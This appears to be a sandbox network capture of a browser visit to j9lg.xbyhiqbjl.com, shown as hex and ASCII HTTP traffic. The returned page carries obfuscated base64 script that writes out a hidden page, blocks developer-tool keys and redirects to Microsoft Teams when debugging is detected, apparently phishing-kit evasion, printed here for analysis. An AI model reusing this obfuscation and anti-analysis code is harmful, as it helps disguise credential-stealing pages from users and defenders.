                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                                                                                            Data Ascii: t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeo
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63
                                                                                                                                                                                                                                                                            Data Ascii: =0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:func
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72 6f 63
                                                                                                                                                                                                                                                                            Data Ascii: (t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doProc
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e 3e 30
                                                                                                                                                                                                                                                                            Data Ascii: ===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>>0
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30
                                                                                                                                                                                                                                                                            Data Ascii: (e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i|0
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34 39 36
                                                                                                                                                                                                                                                                            Data Ascii: -o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=429496
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38 5d 29
                                                                                                                                                                                                                                                                            Data Ascii: A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38])
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c
                                                                                                                                                                                                                                                                            Data Ascii: one.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(c<
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e 35 29
                                                                                                                                                                                                                                                                            Data Ascii: function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.5)


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            3192.168.2.44974423.218.208.109443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                            Server: Kestrel
                                                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                            X-OSID: 2
                                                                                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                                                                                            X-CCC: GB
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=158324
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:44 GMT
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            4192.168.2.449746172.67.211.2414431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:45 UTC652OUTGET /admi/ HTTP/1.1
                                                                                                                                                                                                                                                                            Host: j9lg.xbyhiqbjl.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:45 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RcrQb6bvCGKqTu9LL03uT7DCYeAI6PgAApvETWCbLEWpW9Y3srCy2tPznwozHjdzqYRNoHoGDIOUk%2FkdDLYeXYTetBmuWpmcmYe0NgXxrjEVZ47eyAK86drxMYvhNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=35812&min_rtt=35719&rtt_var=13461&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1559&delivery_rate=79733&cwnd=251&unsent_bytes=0&cid=580d2e710d0e3448&ts=360&x=0"
                                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Im9VYzc1a0g4YUgxWVB3d1VaVWlzcWc9PSIsInZhbHVlIjoiSHhvRVRDS0pqMXdWUkJQQWxBV1lxNVpHTVI2OElsSGxZaVpiSnRlQm5Ld2ZoT081T21pcHRMSHBUc1llMURBRzdqTU9PTjFtcVFtVUFwaGlUckdhSU1aMVNkVDM2Zld0YmhTd0ZjY1ZSRWJsazZXVHpUZkl3SXJ0MHVZcEpTU2IiLCJtYWMiOiJmMjg4OTVlYmQ5YTJhNmU2ZTdhZTA3MDBlZjUxZDY3MzNjYmViODY0ZGIwZmMzODI2NmY3NDllZTY2MTVmODZlIiwidGFnIjoiIn0%3D; expires=Tue, 03-Dec-2024 19:58:45 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 56 6b 56 30 74 4c 4c 30 35 75 55 7a 45 31 52 30 73 77 4e 32 35 33 52 46 46 69 4f 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 57 64 36 62 30 64 73 61 30 4a 52 61 55 74 73 63 57 35 34 62 48 4a 79 5a 57 73 72 4e 44 6c 31 53 45 6f 7a 53 30 4a 6f 65 6e 4d 72 56 48 46 36 59 6a 42 51 62 45 68 6f 4d 56 55 34 51 6c 45 31 54 6c 42 47 51 32 6c 55 5a 47 4d 34 63 45 5a 4e 51 6a 52 49 51 7a 6c 42 52 32 45 30 51 55 6b 7a 65 46 4a 78 4e 32 31 4c 63 6e 46 58 56 58 70 4e 5a 30 78 58 54 6b 78 43 61 6c 56 7a 64 6d 55 72 56 7a 55 35 5a 31 70 73 4e 47 55 34 53 58 6c 4c 59 33 46 4d 52 58 41 30 63 45 39 70 52 6b 52 59 56 33 6c 61 61 57 74 4f 51 6a 6b
                                                                                                                                                                                                                                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjVkV0tLL05uUzE1R0swN253RFFiOFE9PSIsInZhbHVlIjoiNWd6b0dsa0JRaUtscW54bHJyZWsrNDl1SEozS0JoenMrVHF6YjBQbEhoMVU4QlE1TlBGQ2lUZGM4cEZNQjRIQzlBR2E0QUkzeFJxN21LcnFXVXpNZ0xXTkxCalVzdmUrVzU5Z1psNGU4SXlLY3FMRXA0cE9pRkRYV3laaWtOQjk
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 34 63 33 37 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 47 4d 53 35 34 59 6e 6c 6f 61 58 46 69 61 6d 77 75 59 32 39 74 4c 32 46 6b 62 57 6b 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46 31 5a 58 4a 35 4c 54
                                                                                                                                                                                                                                                                            Data Ascii: 4c37<script>if(atob("aHR0cHM6Ly9GMS54YnloaXFiamwuY29tL2FkbWkv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LT
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a 30 4f 69 42 68 64 58 52 76 4f 33 30 4e 43 69 4e 74 51 32 68 73 55 6b 64 53 62 47 31 52 49 43 35 30 5a 58 68 30 4c 57 4e 6c 62 6e 52 6c 63 69 42 37 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 6f 67 59 32 56 75 64 47 56 79 49 57 6c 74 63 47 39 79 64 47 46
                                                                                                                                                                                                                                                                            Data Ascii: Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ0OiBhdXRvO30NCiNtQ2hsUkdSbG1RIC50ZXh0LWNlbnRlciB7dGV4dC1hbGlnbjogY2VudGVyIWltcG9ydGF
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67
                                                                                                                                                                                                                                                                            Data Ascii: QogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUg
                                                                                                                                                                                                                                                                            2024-12-03 17:58:46 UTC1369INData Raw: 5a 61 55 32 31 71 61 53 41 2b 49 47 35 52 55 45 68 46 65 47 70 53 51 6b 55 67 4a 69 59 67 49 58 42 4f 65 57 68 70 62 30 68 30 52 56 51 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 42 4f 65 57 68 70 62 30 68 30 52 56 51 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 4a 32 68 30 64 48 42 7a 4f 69 38 76 64 47 56 68 62 58 4d 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 4c 6d 4e 76 62 53 63 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 66 53 77 67 4d 54 41 77 4d 43 6b 37 44 51 70 39 4b 53 67 70 4f 77 30 4b 49 43 41 67 49 44 77 76 63 32 4e 79 61 58 42 30 50 67 30 4b 50 43 39 6f 5a
                                                                                                                                                                                                                                                                            Data Ascii: ZaU21qaSA+IG5RUEhFeGpSQkUgJiYgIXBOeWhpb0h0RVQpIHsNCiAgICAgICAgICAgIHBOeWhpb0h0RVQgPSB0cnVlOw0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vdGVhbXMubWljcm9zb2Z0LmNvbScpOw0KICAgICAgICB9DQogICAgfSwgMTAwMCk7DQp9KSgpOw0KICAgIDwvc2NyaXB0Pg0KPC9oZ
